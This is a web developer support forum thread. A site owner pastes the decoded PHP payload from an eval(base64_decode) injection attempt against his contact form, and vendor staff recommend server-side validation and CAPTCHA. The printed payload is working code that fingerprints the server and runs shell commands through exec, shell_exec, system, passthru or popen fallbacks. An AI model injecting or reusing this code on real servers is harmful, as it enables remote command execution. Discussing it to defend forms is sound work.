close ad
Help us test the new Databridge BETA with MySQLi support
open ad
View Menu

Technical Support Forums

Free, outstanding support from WebAssist and your colleagues

rating

Security in UE - eval(base64_decode(( Hack

Thread began 1/11/2012 2:02 pm by Steve | Last modified 11/18/2013 11:42 am by Jason Byrnes | 15517 views | 6 replies |

Steve

Security in UE - eval(base64_decode(( Hack

Got a number of emails from one of my UE (latest version) form submissions using the supplied template blank.php today. They were all subject to an attack where a eval(base64_decode string was sent via form email.

Decoded the malicious code produces this result:

echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

This looks like an attempt to find entry, though I am starting the process of scanning my server for any unauthorized access/uploads.

Question: is Universal Email secure against such Hack attempts?

I usually use a form text field that is positioned off screen via css and IF populated, do not process the form (basic Honeypot screening).

But IF there are other things that we should all be doing to protect our sites, and if there are any security concerns related to the WebAssist extensions, it would be helpful for this to be published.

Any comments from Web Assist staff?

Sign in to reply to this post

Jason ByrnesWebAssist

On any public form where you are gathering input from form submission, you should be using the server validation included in either Form Toolkit or CSS form builder to validate the data being entered.

Use email form validation for email form elements

use alpha numeric validation for comments boxes

using alpha numeric validation will prevent php code from being entered as it will fail if characters like ">" "<" or "?" are entered

there are a number of other validation types that can be used to secure your forms.

Sign in to reply to this post

Steve

Thanks for the reply Jason.

I can't help but think is would still be a good idea for you guys to have a separate page or area on your site to make sure people using your extensions are also aware of the proper means of security in developing web sites. Seems every day the Black Hats are working that much hard to cause problems for Developers.

Sign in to reply to this post

info22862

We have found that in all the places we have used WebAssist email, forms and or insert behaviors Bots have now found ways to exploit them. I don't have anything by anecdotal proof, which is out of 50+ websites we dev and manage, the 23 that have the WA email are being hammered by the form bots.

CAPTCHA, Honeypots, and simple JS checking is rendered meaningless by the bots. Unless Web Assist can come with the an answer, the only course of action is to replace the Web Assist forms/email/error checking. We have replaced the code on about half the sites and the bots have been held at bay for a over a week. (they were hitting the form 50 times a day).

I don't post this to be harsh to WA, just honestly looking for a solution outside of removing WA code.

Sign in to reply to this post

Jason ByrnesWebAssist

provide a copy of one of pages.


Javascript validation is not intended as a means of preventing bots from filling in forms. It is intended to give the user feedback while filling in the form.

Server validation is the means to use to prevent bots from spamming your form. make sure that the server validation behavior and the Universal Email behavior are both using the same trigger. if they use different triggers, it can be possible to work around the validation but still send the email.


NOTE: you also posted in another thread. Posting the same problem in multiple places causes confusion, it is best to start your own thread for issues to have them resolved.

Sign in to reply to this post

Steve

Originally Said By: Jason Byrnes
  you should be using the server validation included in either Form Toolkit or CSS form builder to validate the data being entered.  




Jason,
I already have the HTML Editor extension so Form Builder is my best path to be able to sanitize and validate firm field data?

Is one of these extensions over the other to be updated more in the future> Any planned obsolecense I should know of now so I'm not disappointed later?

Sign in to reply to this post

Ray BorduinWebAssist

Form Toolkit can be used to add CAPTCHA to existing forms and add validation.

There are no immediate plans for paid updates to any of these products at the moment.

Sign in to reply to this post

Build websites with a little help from your friends

Your friends over here at WebAssist! These Dreamweaver extensions will assist you in building unlimited, custom websites.

Build websites from already-built web applications

These out-of-the-box solutions provide you proven, tested applications that can be up and running now.  Build a store, a gallery, or a web-based email solution.

Want your website pre-built and hosted?

Close Windowclose

Rate your experience or provide feedback on this page

Account or customer service questions?
Please user our contact form.

Need technical support?
Please visit support to ask a question

Content

rating

Layout

rating

Ease of use

rating

security code refresh image

We do not respond to comments submitted from this page directly, but we do read and analyze any feedback and will use it to help make your experience better in the future.

Close Windowclose

We were unable to retrieve the attached file

Close Windowclose

Attach and remove files

add attachmentAdd attachment
Close Windowclose

Enter the URL you would like to link to in your post

Close Windowclose

This is how you use right click RTF editing

Enable right click RTF editing option allows you to add html markup into your tutorial such as images, bulleted lists, files and more...

-- click to close --

Uploading file...